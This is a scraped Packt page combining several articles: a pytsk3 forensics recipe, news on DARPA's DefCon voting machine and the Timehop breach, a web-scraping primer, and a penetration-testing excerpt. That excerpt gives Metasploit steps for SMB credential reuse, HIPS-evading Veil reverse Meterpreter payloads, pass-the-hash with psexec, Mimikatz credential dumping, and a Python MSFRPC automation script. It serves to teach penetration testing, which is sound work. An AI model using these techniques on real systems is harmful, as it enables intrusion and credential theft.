Save for later

Working with Forensic Evidence Container Recipes

Packt
07 Mar 2018
13 min read
In this article by Preston Miller and Chapin Bryce, authors of Learning Python for Forensics, we introduce a recipe from our upcoming book, Python Digital Forensics Cookbook. In Python Digital Forensics Cookbook, each chapter is comprised of many scripts, or recipes, falling under specific themes. The "Iterating Through Files" recipe shown here, is from our chapter that introduces the Sleuth Kit's Python binding's, pystk3, and other libraries, to programmatically interact with forensic evidence containers. Specifically, this recipe shows how to access a forensic evidence container and iterate through all of its files to create an active file listing of its contents. (For more resources related to this topic, see here.) If you are reading this article, it goes without saying that Python is a key tool in DFIR investigations. However, most examiners, are not familiar with or do not take advantage of the Sleuth Kit's Python bindings. Imagine being able to run your existing scripts against forensic containers without needing to mount them or export loose files. This recipe continues to introduce the library, pytsk3, that will allow us to do just that and take our scripting capabilities to the next level. In this recipe, we learn how to recurse through the filesystem and create an active file listing. Oftentimes, one of the first questions we, as the forensic examiner, are asked is "What data is on the device?". An active file listing comes in handy here. Creating a file listing of loose files is a very straightforward task in Python. However, this will be slightly more complicated because we are working with a forensic image rather than loose files. This recipe will be a cornerstone for future scripts as it will allow us to recursively access and process every file in the image. As we continue to introduce new concepts and features from the Sleuth Kit, we will add new functionality to our previous recipes in an iterative process. In a similar way, this recipe will become integral in future recipes to iterate through directories and process files. Getting started Refer to the Getting started section in the Opening Acquisitions recipe for information on the build environment and setup details for pytsk3 and pyewf. All other libraries used in this script are present in Python's standard library. How to do it... We perform the following steps in this recipe: Import argparse, csv, datetime, os, pytsk3, pyewf, and sys; Identify if the evidence container is a raw (DD) image or an EWF (E01) container; Access the forensic image using pytsk3; Recurse through all directories in each partition; Store file metadata in a list; And write the active file list to a CSV. How it works... This recipe's command-line handler takes three positional arguments: EVIDENCE_FILE, TYPE, OUTPUT_CSV which represents the path to the evidence file, the type of evidence file, and the output CSV file, respectively. Similar to the previous recipe, the optional p switch can be supplied to specify a partition type. We use the os.path.dirname() method to extract the desired output directory path for the CSV file and, with the os.makedirs() function, create the necessary output directories if they do not exist. if __name__ == '__main__': # Command-line Argument Parser parser = argparse.ArgumentParser() parser.add_argument("EVIDENCE_FILE", help="Evidence file path") parser.add_argument("TYPE", help="Type of Evidence", choices=("raw", "ewf")) parser.add_argument("OUTPUT_CSV", help="Output CSV with lookup results") parser.add_argument("-p", help="Partition Type", choices=("DOS", "GPT", "MAC", "SUN")) args = parser.parse_args() directory = os.path.dirname(args.OUTPUT_CSV) if not os.path.exists(directory) and directory != "": os.makedirs(directory) Once we have validated the input evidence file by checking that it exists and is a file, the four arguments are passed to the main() function. If there is an issue with initial validation of the input, an error is printed to the console before the script exits. if os.path.exists(args.EVIDENCE_FILE) and os.path.isfile(args.EVIDENCE_FILE): main(args.EVIDENCE_FILE, args.TYPE, args.OUTPUT_CSV, args.p) else: print("[-] Supplied input file {} does not exist or is not a file".format(args.EVIDENCE_FILE)) sys.exit(1) In the main() function, we instantiate the volume variable with None to avoid errors referencing it later in the script. After printing a status message to the console, we check if the evidence type is an E01 to properly process it and create a valid pyewf handle as demonstrated in more detail in the Opening Acquisitions recipe. Refer to that recipe for more details as this part of the function is identical. The end result is the creation of the pytsk3 handle, img_info, for the user supplied evidence file. def main(image, img_type, output, part_type): volume = None print "[+] Opening {}".format(image) if img_type == "ewf": try: filenames = pyewf.glob(image) except IOError, e: print "[-] Invalid EWF format:n {}".format(e) sys.exit(2) ewf_handle = pyewf.handle() ewf_handle.open(filenames) # Open PYTSK3 handle on EWF Image img_info = ewf_Img_Info(ewf_handle) else: img_info = pytsk3.Img_Info(image) Next, we attempt to access the volume of the image using the pytsk3.Volume_Info() method by supplying it the image handle. If the partition type argument was supplied, we add its attribute ID as the second argument. If we receive an IOError when attempting to access the volume, we catch the exception as e and print it to the console. Notice, however, that we do not exit the script as we often do when we receive an error. We'll explain why in the next function. Ultimately, we pass the volume, img_info, and output variables to the openFS() method. try: if part_type is not None: attr_id = getattr(pytsk3, "TSK_VS_TYPE_" + part_type) volume = pytsk3.Volume_Info(img_info, attr_id) else: volume = pytsk3.Volume_Info(img_info) except IOError, e: print "[-] Unable to read partition table:n {}".format(e) openFS(volume, img_info, output) The openFS() method tries to access the filesystem of the container in two ways. If the volume variable is not None, it iterates through each partition, and if that partition meets certain criteria, attempts to open it. If, however, the volume variable is None, it instead tries to directly call the pytsk3.FS_Info() method on the image handle, img. As we saw, this latter method will work and give us filesystem access for logical images whereas the former works for physical images. Let's look at the differences between these two methods. Regardless of the method, we create a recursed_data list to hold our active file metadata. In the first instance, where we have a physical image, we iterate through each partition and check that is it greater than 2,048 sectors and does not contain the words "Unallocated", "Extended", or "Primary Table" in its description. For partitions meeting these criteria, we attempt to access its filesystem using the FS_Info() function by supplying the pytsk3 img object and the offset of the partition in bytes. If we are able to access the filesystem, we use to open_dir() method to get the root directory and pass that, along with the partition address ID, the filesystem object, two empty lists, and an empty string, to the recurseFiles() method. These empty lists and string will come into play in recursive calls to this function as we will see shortly. Once the recurseFiles() method returns, we append the active file metadata to the recursed_data list. We repeat this process for each partition def openFS(vol, img, output): print "[+] Recursing through files.." recursed_data = [] # Open FS and Recurse if vol is not None: for part in vol: if part.len > 2048 and "Unallocated" not in part.desc and "Extended" not in part.desc and "Primary Table" not in part.desc: try: fs = pytsk3.FS_Info(img, offset=part.start*vol.info.block_size) except IOError, e: print "[-] Unable to open FS:n {}".format(e) root = fs.open_dir(path="/") data = recurseFiles(part.addr, fs, root, [], [], [""]) recursed_data.append(data) We employ a similar method for the second instance, where we have a logical image, where the volume is None. In this case, we attempt to directly access the filesystem and, if successful, we pass that to the recurseFiles() method and append the returned data to our recursed_data list. Once we have our active file list, we send it and the user supplied output file path to the csvWriter() method. Let's dive into the recurseFiles() method which is the meat of this recipe. else: try: fs = pytsk3.FS_Info(img) except IOError, e: print "[-] Unable to open FS:n {}".format(e) root = fs.open_dir(path="/") data = recurseFiles(1, fs, root, [], [], [""]) recursed_data.append(data) csvWriter(recursed_data, output) The recurseFiles() function is based on an example of the FLS tool (https://github.com/py4n6/pytsk/blob/master/examples/fls.py) and David Cowen's Automating DFIR series tool dfirwizard (https://github.com/dlcowen/dfirwizard/blob/master/dfirwiza rd-v9.py). To start this function, we append the root directory inode to the dirs list. This list is used later to avoid unending loops. Next, we begin to loop through each object in the root directory and check that it has certain attributes we would expect and that its name is not either "." or "..". def recurseFiles(part, fs, root_dir, dirs, data, parent): dirs.append(root_dir.info.fs_file.meta.addr) for fs_object in root_dir: # Skip ".", ".." or directory entries without a name. if not hasattr(fs_object, "info") or not hasattr(fs_object.info, "name") or not hasattr(fs_object.info.name, "name") or fs_object.info.name.name in [".", ".."]: continue If the object passes that test, we extract its name using the info.name.name attribute. Next, we use the parent variable, which was supplied as one of the function's inputs, to manually create the file path for this object. There is no built-in method or attribute to do this automatically for us. We then check if the file is a directory or not and set the f_type variable to the appropriate type. If the object is a file, and it has an extension, we extract it and store it in the file_ext variable. If we encounter an AttributeError when attempting to extract this data we continue onto the next object. try: file_name = fs_object.info.name.name file_path = "{}/{}".format("/".join(parent), fs_object.info.name.name) try: if fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR: f_type = "DIR" file_ext = "" else: f_type = "FILE" if "." in file_name: file_ext = file_name.rsplit(".")[-1].lower() else: file_ext = "" except AttributeError: continue We create variables for the object size and timestamps. However, notice that we pass the dates to a convertTime() method. This function exists to convert the UNIX timestamps into a human-readable format. With these attributes extracted, we append them to the data list using the partition address ID to ensure we keep track of which partition the object is from size = fs_object.info.meta.size create = convertTime(fs_object.info.meta.crtime) change = convertTime(fs_object.info.meta.ctime) modify = convertTime(fs_object.info.meta.mtime) data.append(["PARTITION {}".format(part), file_name, file_ext, f_type, create, change, modify, size, file_path]) If the object is a directory, we need to recurse through it to access all of its sub-directories and files. To accomplish this, we append the directory name to the parent list. Then, we create a directory object using the as_directory() method. We use the inode here, which is for all intents and purposes a unique number and check that the inode is not already in the dirs list. If that were the case, then we would not process this directory as it would have already been processed. If the directory needs to be processed, we call the recurseFiles() method on the new sub_directory and pass it current dirs, data, and parent variables. Once we have processed a given directory, we pop that directory from the parent list. Failing to do this will result in false file path details as all of the former directories will continue to be referenced in the path unless removed. Most of this function was under a large try-except block. We pass on any IOError exception generated during this process. Once we have iterated through all of the subdirectories, we return the data list to the openFS() function. if f_type == "DIR": parent.append(fs_object.info.name.name) sub_directory = fs_object.as_directory() inode = fs_object.info.meta.addr # This ensures that we don't recurse into a directory # above the current level and thus avoid circular loops. if inode not in dirs: recurseFiles(part, fs, sub_directory, dirs, data, parent) parent.pop(-1) except IOError: pass dirs.pop(-1) return data Let's briefly look at the convertTime() function. We've seen this type of function before, if the UNIX timestamp is not 0, we use the datetime.utcfromtimestamp() method to convert the timestamp into a human-readable format. def convertTime(ts): if str(ts) == "0": return "" return datetime.utcfromtimestamp(ts) With the active file listing data in hand, we are now ready to write it to a CSV file using the csvWriter() method. If we did find data (i.e., the list is not empty), we open the output CSV file, write the headers, and loop through each list in the data variable. We use the csvwriterows() method to write each nested list structure to the CSV file. def csvWriter(data, output): if data == []: print "[-] No output results to write" sys.exit(3) print "[+] Writing output to {}".format(output) with open(output, "wb") as csvfile: csv_writer = csv.writer(csvfile) headers = ["Partition", "File", "File Ext", "File Type", "Create Date", "Modify Date", "Change Date", "Size", "File Path"] csv_writer.writerow(headers) for result_list in data: csv_writer.writerows(result_list) The screenshot below demonstrates the type of data this recipe extracts from forensic images. There's more... For this recipe, there are a number of improvements that could further increase its utility: Use tqdm, or another library, to create a progress bar to inform the user of the current execution progress. Learn about the additional metadata values that can be extracted from filesystem objects using pytsk3 and add them to the output CSV file. Summary In summary, we have learned how to use pytsk3 to recursively iterate through any supported filesystem by the Sleuth Kit. This comprises the basis of how we can use the Sleuth Kit to programmatically process forensic acquisitions. With this recipe, we will now be able to further interact with these files in future recipes. Resources for Article:   Further resources on this subject: [article] [article] [article]
Read more
  • 0
  • 0
  • 16190

article-image-at-defcon-27-darpas-10-million-voting-system-could-not-be-hacked-by-voting-village-hackers-due-to-a-bug
Savia Lobo
12 Aug 2019
4 min read
Save for later

At DefCon 27, DARPA's $10 million voting system could not be hacked by Voting Village hackers due to a bug

Savia Lobo
12 Aug 2019
4 min read
At the DefCon security conference in Las Vegas, for the last two years, hackers have come to the Voting Village every year to scrutinize voting machines and analyze them for vulnerabilities. This year, at DefCon 27, the targeted voting machine included a $10 million project by DARPA (Defense Advanced Research Projects Agency). However, hackers were unable to break into the system, not because of robust security features, but due to technical difficulties during the setup. “A bug in the machines didn't allow hackers to access their systems over the first two days,” CNet reports. DARPA announced this voting system in March, this year, hoping that it “will be impervious to hacking”. The system will be designed by the Oregon-based verifiable systems firm, Galois. “The agency hopes to use voting machines as a model system for developing a secure hardware platform—meaning that the group is designing all the chips that go into a computer from the ground up, and isn’t using proprietary components from companies like Intel or AMD,” Wired reports. Linton Salmon, the project’s program manager at Darpa says, “The goal of the program is to develop these tools to provide security against hardware vulnerabilities. Our goal is to protect against remote attacks.” Voting Village's co-founder Harri Hursti said, the five machines brought in by Galois, “seemed to have had a myriad of different kinds of problems. Unfortunately, when you're pushing the envelope on technology, these kinds of things happen." “The Darpa machines are prototypes, currently running on virtualized versions of the hardware platforms they will eventually use.” However, at Voting Village 2020, Darpa plans to include complete systems for hackers to access. Dan Zimmerman, principal researcher at Galois said, “All of this is here for people to poke at. I don’t think anyone has found any bugs or issues yet, but we want people to find things. We’re going to make a small board solely for the purpose of letting people test the secure hardware in their homes and classrooms and we’ll release that.” Sen. Wyden says if voting system security standards fail to change, the consequences will be much worse than 2016 elections After the cyberattacks in the 2016 U.S. presidential elections, there is a higher risk of securing voters data in the upcoming presidential elections next year. Senator Ron Wyden said if the voting system security standards fail to change, the consequences could be far worse than the 2016 elections. In his speech on Friday at the Voting Village, Wyden said, "If nothing happens, the kind of interference we will see form hostile foreign actors will make 2016 look like child's play. We're just not prepared, not even close, to stop it." Wyden proposed an election security bill requiring paper ballots in 2018. However, the bill was blocked in the Senate by Majority Leader Mitch McConnell who called the bill a partisan legislation. On Friday, a furious Wyden held McConnell responsible calling him the reason why Congress hasn't been able to fix election security issues. "It sure seems like Russia's No. 1 ally in compromising American election security is Mitch McConnell," Wyden said. https://twitter.com/ericgeller/status/1159929940533321728 According to a security researcher, the voting system has a terrible software vulnerability Dan Wallach, a security researcher at Rice University in Houston, Texas told Wired, “There’s a terrible software vulnerability in there. I know because I wrote it. It’s a web server that anyone can connect to and read/write arbitrary memory. That’s so bad. But the idea is that even with that in there, an attacker still won’t be able to get to things like crypto keys or anything really. All they would be able to do right now is crash the system.” According to CNet, “While the voting process worked, the machines weren't able to connect with external devices, which hackers would need in order to test for vulnerabilities. One machine couldn't connect to any networks, while another had a test suite that didn't run, and a third machine couldn't get online.” The machine's prototype allows people to vote with a touchscreen, print out their ballot and insert it into the verification machine, which ensures that votes are valid through a security scan. According to Wired, Galois even added vulnerabilities on purpose to see how its system defended against flaws. https://twitter.com/VotingVillageDC/status/1160663776884154369 To know more about this news in detail, head over to Wired report. DARPA plans to develop a communication platform similar to WhatsApp DARPA’s $2 Billion ‘AI Next’ campaign includes a Next-Generation Nonsurgical Neurotechnology (N3) program Black Hat USA 2019 conference Highlights: IBM’s ‘warshipping’, OS threat intelligence bots, Apple’s $1M bug bounty programs and much more!
Read more
  • 0
  • 0
  • 16171

article-image-exploiting-services-python
Packt
24 Sep 2015
15 min read
Save for later

Exploiting Services with Python

Packt
24 Sep 2015
15 min read
In this article by Christopher Duffy author of the book Learning Python Penetration Testing, we will learn about one of the big misconceptions with testing for the synchronization of account credentials today, is the prevalence of exploitable. You will still find vulnerabilities that can be exploited by overflowing the stack or heap, they are just significantly reduced or more complex. (For more resources related to this topic, see here.) Testing for the synchronization of account credentials With these results, we can determine if any of these credentials are reused in the network. We know there are Windows hosts primarily in the target network, but we need to identify which ones have port 445 open. We can then try and determine, which accounts might grant us access, when the following command is run: nmap -sS -vvv -p445 192.168.195.0/24 -oG output Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled. grep 445/open output| cut -d" " -f2 >> smb_hosts The passwords can be extracted directly from John and written a password file that can be used for follow-on service attacks. john --show unshadowed |cut -d: -f2|grep -v " " > passwords Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module. The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag on this method of testing for logins. The third module smb_enumusers, which can be used, but it only provides details related to locale users as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to laterally move. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit using Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found here at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool, to output the results to a log file so you can go back and review the results. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged in users relevant to the returned account names and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash attack (PtH). The psexec module allows you to either pass the extracted Local Area Network Manager (LM): New Technology LM (NTLM) hash and username combination or just the username password pair to get access. To begin with, we setup a custom multi/handler to catch the custom exploit we generated by Veil as shownfollowing. Keep in mind, I used 443 for the local port because it bypasses most HIPS and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms, to see the specific payload you want to use, to execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code, keep in mind this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that often use native system languages can be purely stager. The second part is the stage, which are the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, these are often singles. The output will be an executable, that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can setup the psexec module to reference the custom payload for execution. Update the psexec module, so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or the following command from shell access. net group "Domain Admins" We can then Grep through the spooled output file from the previously run module to locate relevant systems that might have these Das logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries. grep <username> <spoofile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system all you have to do is load mimikatz and extract the credentials typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz as you can see following. The credentials are in memory and since the target box was Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets. Automating the exploit train with Python This exploit train is relatively simple, but we can automate a portion of this with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active ports of 445, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs msfrpc library for Python. This library can be found here at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify what interface IP addresses belong to your host. It then scans for port 445 the SMB port on the IP address, range, or the Classes Inter Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interface and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script in addition to real time response are two files, a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script, if you as an attacker find other credential sets to test as shown following: Lastly, the script can be passed hashes directly just like the Metasploit module as shown following: The output will be slightly different for each running of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical with a Metasploit console initiation. Now there are a couple things that have to be stated, yes you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also the MSFRPC can have resource files fed directly into it as well, but it can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. Like all scripts libraries are needed to be established, most of these you are already familiar with, the newest one relates to the MSFRPC by SpiderLabs. The required libraries for this script can be seen as follows: import os, argparse, sys, time try: import msfrpc except: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except: sys.exit("[!] Install the nmap library: pip install python- nmap") try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a module, to identify relevant targets that are going to have the auxiliary module run against it. First, we setup the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results. def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded by the file, and they are separated by spaces. The ipfile is opened and read and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library. if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses for all of the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are then written to the relevant output file and python lists, and then returned to the original call origin. if host != None: e = open(hosts_output, 'a', bufsize) if service_name or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) if not scanner.all_hosts(): e.closed if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; this function will be called for each host the scan returned back as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = '''use ''' + module + ''' set RHOSTS ''' + ip + ''' set SMBUser ''' + user + ''' set SMBPass ''' + passwd + ''' set SMBDomain ''' + dom +''' run ''' return command, module The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with the MSFRPC and creates console then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions, and as such we have to track our session to a console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service. The script then creates the necessary commands for each of those IP addresses. for ip in iplist: if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has completed, the results are written in the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up the work we had done. e.closed client.call('console.destroy',[console_id]) The final pieces of the script are related to setting up the arguments, setting up the constructors and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading of the msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped, Metasploit has moved to msgrpc verses msfrpc, but everyone still refers to it as msfrpc. The big difference is the msgrpc library uses POST requests to send data while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment. Specifically, how to exploit a relative box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python[article] Scraping the Data[article] Modeling complex functions with artificial neural networks [article]
Read more
  • 0
  • 0
  • 16067
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-timehop-suffers-data-breach-21-million-users-data-compromised
Richard Gall
09 Jul 2018
3 min read
Save for later

Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that brings old posts into your feed, experienced a data breach on July 4. In a post published yesterday (July 8) the team explained that 'an access credential to our cloud computing enterprise was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization." Timehop has already acted to make necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on social media accounts. The team has deactivated the keys that allow the app to read and show users social media posts on their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to "contact with a large number of partners." The investigation needed to be thorough in order for the response to be clear and coordinated. How did the Timehop data breach happen? For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized users credentials. This user then conducted 'reconnaisance activities' once they had created a new administrative account. This user logged in to the account on numerous occasions after this in March and June 2018. It was only on July 4 that the attacker then attempted to access the production database. Timehop then states that they "conducted a specific action that triggered an alarm" which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation. This included analyzing the attacker's activity on the network and auditing all security permissions and processes. A measured response to a potential crisis It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.  Read next: Did Facebook just have another security scare? What security and systems specialists are planning to learn in 2018
Read more
  • 0
  • 0
  • 15994

article-image-scraping-web-python-quick-start
Packt
17 Feb 2016
9 min read
Save for later

Scraping the Web with Python - Quick Start

Packt
17 Feb 2016
9 min read
In this article we're going to acquire intelligence data from a variety of sources. We might interview people. We might steal files from a secret underground base. We might search the World Wide Web (WWW). (For more resources related to this topic, see here.) Accessing data from the Internet The WWW and Internet are based on a series of agreements called Request for Comments (RFC). The RFCs define the standards and protocols to interconnect different networks, that is, the rules for internetworking. The WWW is defined by a subset of these RFCs that specifies the protocols, behaviors of hosts and agents (servers and clients), and file formats, among other details. In a way, the Internet is a controlled chaos. Most software developers agree to follow the RFCs. Some don't. If their idea is really good, it can catch on, even though it doesn't precisely follow the standards. We often see this in the way some browsers don't work with some websites. This can cause confusion and questions. We'll often have to perform both espionage and plain old debugging to figure out what's available on a given website. Python provides a variety of modules that implement the software defined in the Internet RFCs. We'll look at some of the common protocols to gather data through the Internet and the Python library modules that implement these protocols. Background briefing – the TCP/IP protocols The essential idea behind the WWW is the Internet. The essential idea behind the Internet is the TCP/IP protocol stack. The IP part of this is the internetworking protocol. This defines how messages can be routed between networks. Layered on top of IP is the TCP protocol to connect two applications to each other. TCP connections are often made via a software abstraction called a socket. In addition to TCP, there's also UDP; it's not used as much for the kind of WWW data we're interested in. In Python, we can use the low-level socket library to work with the TCP protocol, but we won't. A socket is a file-like object that supports open, close, input, and output operations. Our software will be much simpler if we work at a higher level of abstraction. The Python libraries that we'll use will leverage the socket concept under the hood. The Internet RFCs defines a number of protocols that build on TCP/IP sockets. These are more useful definitions of interactions between host computers (servers) and user agents (clients). We'll look at two of these: Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP). Using http.client for HTTP GET The essence of web traffic is HTTP. This is built on TCP/IP. HTTP defines two roles: host and user agent, also called server and client, respectively. We'll stick to server and client. HTTP defines a number of kinds of request types, including GET and POST. A web browser is one kind of client software we can use. This software makes GET and POST requests, and displays the results from the web server. We can do this kind of client-side processing in Python using two library modules. The http.client module allows us to make GET and POST requests as well as PUT and DELETE. We can read the response object. Sometimes, the response is an HTML page. Sometimes, it's a graphic image. There are other things too, but we're mostly interested in text and graphics. Here's a picture of a mysterious device we've been trying to find. We need to download this image to our computer so that we can see it and send it to our informant from http://upload.wikimedia.org/wikipedia/commons/7/72/IPhone_Internals.jpg: Here's a picture of the currency we're supposed to track down and pay with: We need to download this image. Here is the link: http://upload.wikimedia.org/wikipedia/en/c/c1/1drachmi_1973.jpg Here's how we can use http.client to get these two image files: import http.client import contextlib path_list = [ "/wikipedia/commons/7/72/IPhone_Internals.jpg", "/wikipedia/en/c/c1/1drachmi_1973.jpg", ] host = "upload.wikimedia.org" with contextlib.closing(http.client.HTTPConnection( host )) as connection: for path in path_list: connection.request( "GET", path ) response= connection.getresponse() print("Status:", response.status) print("Headers:", response.getheaders()) _, _, filename = path.rpartition("/") print("Writing:", filename) with open(filename, "wb") as image: image.write( response.read() ) We're using http.client to handle the client side of the HTTP protocol. We're also using the contextlib module to politely disentangle our application from network resources when we're done using them. We've assigned a list of paths to the path_list variable. This example introduces list objects without providing any background. It's important that lists are surrounded by [] and the items are separated by ,. Yes, there's an extra , at the end. This is legal in Python. We created an http.client.HTTPConnection object using the host computer name. This connection object is a little like a file; it entangles Python with operating system resources on our local computer plus a remote server. Unlike a file, an HTTPConnection object isn't a proper context manager. As we really like context managers to release our resources, we made use of the contextlib.closing() function to handle the context management details. The connection needs to be closed; the closing() function assures that this will happen by calling the connection's close() method. For all of 